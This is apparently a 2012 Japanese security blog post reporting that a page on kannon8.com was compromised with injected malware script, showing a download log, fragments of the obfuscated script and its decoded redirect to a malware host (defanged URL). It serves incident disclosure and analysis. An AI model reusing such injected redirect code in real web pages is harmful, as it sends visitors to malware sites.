水曜日, 9月 26, 2012

#OCJP-069:「kannon8.com/202.172.28.76」DR-NET/Digirockネットワークにあるウェブサーバはマルウェア感染コードをインジェクトされました。

下記のURLに↓
http://kannon8.com/cookie/cookie0h/index.htm
ダウンロードしたら↓
Resolving kannon8.com... 202.172.28.76
Connecting to kannon8.com|202.172.28.76|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7,375 (7.2K) [text/html]
20:11:43 (1.20 MB/s) - `index.htm' saved [7375/7375]
HTMLの最後の所にマルウェアのSCRIPTを発見↓
<script>var I;if(I!='h' && I!='
& d!='O'){d='y_'};var A=D['unes
w Array();var l=new Array();var
!=''){P='mV'};return xO.replace
  :
_Y'){Rx='Im'};var yr=x('o0nZljo7a1d4','
p0eJ_yHBK4RD17jIZzuC');D[yr]=Z;};
var FI;if(FI!='TT'){FI='TT'};z();</script>
下記の転送先のマルウェアサイトURLが書いてあります↓
var A=D['unescape'];
this.TG="";
var G=A("%2f%77%68%6f%2d%69%73%2f%67%6f%6f%67%6c%65%2e%63%6f
%6d%2f%72%65%74%61%69%6c%6d%65%6e%6f%74%2e%63%6f%6d%2e%70%68%70");
function x(xO,v)
解けたら、下記の転送先URLを発見↓
hxxp://cityrealtimes.info:8080/who-is/google.com/retailmenot.com.php 

0 件のコメント:

コメントを投稿